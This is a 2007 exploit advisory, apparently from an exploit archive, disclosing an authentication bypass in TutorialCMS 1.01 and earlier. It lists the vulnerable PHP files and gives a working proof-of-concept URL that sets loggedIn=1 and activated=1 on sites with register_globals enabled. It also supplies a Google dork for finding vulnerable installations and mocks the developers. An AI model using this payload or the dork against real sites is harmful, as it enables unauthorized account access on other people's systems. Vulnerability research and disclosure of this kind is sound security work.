Home / os / solaris

tutorialcms-bypass.txt

Posted on 22 May 2007

################################################################################# # # # TutorialCMS <= 1.01 Authentication Bypass # # # # Discovered by: Silentz # # Payload: Authentication Bypass # # Website: http://www.w4ck1ng.com # # # # Vulnerability: # # # # Variables $loggedIn & $activated are not predefined. # # # # Vulnerable Files: # # # # login.php # # headerLinks.php # # submit1.php # # myFav.php # # userCP.php # # # # # # PoC: http://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1 # # # # Subject To: register_globals set to on # # GoogleDork: "Powered By Photoshop Tutorials" # # # # Shoutz: The entire w4ck1ng community # # # # Notes to developers: # # # # You should allways fully disclose the vulnerabilities before someone # # else does, just looks better. Also, try changing the "Date Modified" # # stamp on the files before you wrap it up for upload ;) # # # #################################################################################

 

TOP